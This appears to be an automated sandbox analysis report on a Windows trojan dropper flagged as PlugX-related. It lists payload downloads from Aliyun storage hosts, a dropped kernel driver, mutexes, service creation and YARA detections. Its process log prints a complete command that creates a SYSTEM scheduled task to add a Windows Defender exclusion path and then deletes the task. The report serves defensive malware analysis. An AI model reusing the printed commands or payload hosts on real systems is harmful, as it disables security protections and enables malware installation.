              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: GetDataHost: hu5wd1.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /FOM-52.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /FOM-53.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: hu5wd1.oss-cn-beijing.aliyuncs.com
              Source: global trafficDNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com
              Source: global trafficDNS traffic detected: DNS query: oheykp.net
              Source: qNHTRl.exe, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s/%d.dll
              Source: qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s/%d.dllC:
              Source: qNHTRl.exe, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s/ip.txt
              Source: qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s/ip.txtC:
              Source: qNHTRl.exe, qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s/upx.rar
              Source: qNHTRl.exe, 00000029.00000002.3983670816.0000000004240000.00000004.00000020.00020000.00000000.sdmp, qNHTRl.exe, 00000029.00000002.3984518385.000000001002D000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s/upx.rarC:
              Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
              Source: 189atohci.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 7tqorj.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
              Source: 189atohci.sys.0.drString found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
              Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
              Source: 189atohci.sys.0.drString found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
              Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0I
              Source: 189atohci.sys.0.drString found in binary or memory: http://ocsp.digicert.com0P
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 7tqorj.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drString found in binary or memory: http://s.symcd.com06
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drString found in binary or memory: http://s.symcd.com0_
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drString found in binary or memory: http://s2.symcb.com0
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0a
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drString found in binary or memory: http://sv.symcd.com0&
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drString found in binary or memory: http://sw.symcd.com0
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 7tqorj.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 7tqorj.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 7tqorj.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
              Source: 189atohci.sys.0.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
              Source: 7tqorj.exe, 00000007.00000003.2996806877.0000000003DE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg
              Source: 7tqorj.exe, 00000007.00000003.2996806877.0000000003DE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51
              Source: 7tqorj.exe, 00000007.00000003.2996806877.0000000003DE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg
              Source: 7tqorj.exe, 00000007.00000003.2996806877.0000000003DE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg
              Source: 7tqorj.exe, 00000007.00000003.2996806877.0000000003DE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
              Source: 7tqorj.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0)
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmp, 7tqorj.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gif
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gif;
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gifhttps://hu5wd1.oss-cn-beijing.aliyuncs.com/b.gifhttp
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gify
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/b.gif
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/b.gifz
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.gif
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.gif2
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.gifi
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gif
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gif=UY
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gifRU5
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625679600.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gift
              Source: 189atohci.sys.0.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
              Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
              Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
              Source: unknownHTTPS traffic detected: 39.103.20.26:443 -> 192.168.2.6:49921 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.6:49992 version: TLS 1.2

              System Summary

              barindex
              Source: 5.2.7tqorj.exe.2880000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 6.2.7tqorj.exe.2830000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: 41.2.qNHTRl.exe.3100000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
              Source: Process Memory Space: qNHTRl.exe PID: 5052, type: MEMORYSTRMatched rule: PlugX Identifying Strings Author: Seth Hardy
              Source: tbcore3U.dll.7.drStatic PE information: section name: .%?.
              Source: tbcore3U.dll.7.drStatic PE information: section name: .%-[
              Source: tbcore3U.dll.7.drStatic PE information: section name: .mo:
              Source: tbcore3U.dll.41.drStatic PE information: section name: .%?.
              Source: tbcore3U.dll.41.drStatic PE information: section name: .%-[
              Source: tbcore3U.dll.41.drStatic PE information: section name: .mo:
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_0000000140006C95 NtAllocateVirtualMemory,5_2_0000000140006C95
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_000000014000C3F05_2_000000014000C3F0
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_000000014000CC005_2_000000014000CC00
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_0000000140001A305_2_0000000140001A30
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_000000014000C2A05_2_000000014000C2A0
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_00000001400022C05_2_00000001400022C0
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_00000001400110F05_2_00000001400110F0
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_0000000140010CF05_2_0000000140010CF0
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_00000001400093005_2_0000000140009300
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_000000014000BB705_2_000000014000BB70
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_0000000140003F805_2_0000000140003F80
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_00000001400103D05_2_00000001400103D0
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_00007FFDA58102485_2_00007FFDA5810248
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_00007FFDA580A1B85_2_00007FFDA580A1B8
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeCode function: 43_2_00FA4AE243_2_00FA4AE2
              Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\2U36F\NroRNr.exe 7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
              Source: 2749837485743-7684385786.05.exe, 00000000.00000000.2119902937.0000000141D79000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameWatersPrintCaptureProxy.EXEJ vs 2749837485743-7684385786.05.exe
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevseamps.exe, vs 2749837485743-7684385786.05.exe
              Source: 2749837485743-7684385786.05.exe, 00000000.00000003.2625781442.0000000004992000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSa.dllp( vs 2749837485743-7684385786.05.exe
              Source: 2749837485743-7684385786.05.exeBinary or memory string: OriginalFilenameWatersPrintCaptureProxy.EXEJ vs 2749837485743-7684385786.05.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
              Source: 5.2.7tqorj.exe.2880000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 6.2.7tqorj.exe.2830000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: 41.2.qNHTRl.exe.3100000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
              Source: Process Memory Space: qNHTRl.exe PID: 5052, type: MEMORYSTRMatched rule: PlugXStrings author = Seth Hardy, description = PlugX Identifying Strings, last_modified = 2014-06-12
              Source: 189atohci.sys.0.drBinary string: \Device\Driver\
              Source: 189atohci.sys.0.drBinary string: \Device\TrueSight
              Source: classification engineClassification label: mal100.troj.evad.winEXE@65/29@14/3
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,5_2_0000000140003F80
              Source: C:\Users\user\Documents\7tqorj.exeCode function: GetModuleFileNameW,OpenSCManagerW,GetLastError,CreateServiceW,CloseServiceHandle,GetLastError,CloseServiceHandle,5_2_0000000140001430
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520
              Source: C:\Users\user\Documents\7tqorj.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520
              Source: C:\Users\user\Documents\7tqorj.exeFile created: C:\Program Files (x86)\qNHTRlJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\i[1].datJump to behavior
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeMutant created: \Sessions\1\BaseNamedObjects\Global\IEToolbarUninstaller
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6856:120:WilError_03
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeMutant created: \Sessions\1\BaseNamedObjects\26f3475fc22
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1268:120:WilError_03
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeMutant created: \Sessions\1\BaseNamedObjects\{4E062DDA-444A-A2A8-84CE-E105F66A5AB3}
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:420:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7116:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6916:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5700:120:WilError_03
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeMutant created: \Sessions\1\BaseNamedObjects\8.217.59.73:8917:Sauron
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5996:120:WilError_03
              Source: C:\Users\user\Documents\7tqorj.exeMutant created: \Sessions\1\BaseNamedObjects\48c47662941
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5828:120:WilError_03
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeMutant created: \Sessions\1\BaseNamedObjects\LJPXYXC
              Source: C:\Program Files (x86)\qNHTRl\qNHTRl.exeMutant created: \Sessions\1\BaseNamedObjects\aefd_849224
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeCommand line argument: tbcore3.dll43_2_00FA1000
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeCommand line argument: tbcore3.dll43_2_00FA1000
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeCommand line argument: tbcore3U.dll43_2_00FA1000
              Source: C:\Program Files (x86)\2U36F\NroRNr.exeCommand line argument: tbcore3U.dll43_2_00FA1000
              Source: 2749837485743-7684385786.05.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Documents\7tqorj.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: qNHTRl.exeString found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
              Source: qNHTRl.exeString found in binary or memory: <Repetition> <Interval>PT1M</Interval> <StopAtDurationEnd>false</StopAtDurationEnd> </Repetition> <Sta
              Source: qNHTRl.exeString found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
              Source: qNHTRl.exeString found in binary or memory: tartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate>
              Source: qNHTRl.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
              Source: qNHTRl.exeString found in binary or memory: <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>t
              Source: C:\Users\user\Desktop\2749837485743-7684385786.05.exeFile read: C:\Users\user\Desktop\2749837485743-7684385786.05.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\2749837485743-7684385786.05.exe "C:\Users\user\Desktop\2749837485743-7684385786.05.exe"
              Source: unknownProcess created: C:\Users\user\Documents\7tqorj.exe C:\Users\user\Documents\7tqorj.exe
              Source: unknownProcess created: C:\Users\user\Documents\7tqorj.exe C:\Users\user\Documents\7tqorj.exe
              Source: unknownProcess created: C:\Users\user\Documents\7tqorj.exe C:\Users\user\Documents\7tqorj.exe
              Source: C:\Users\user\Documents\7tqorj.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Run /TN "Task1"
              Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
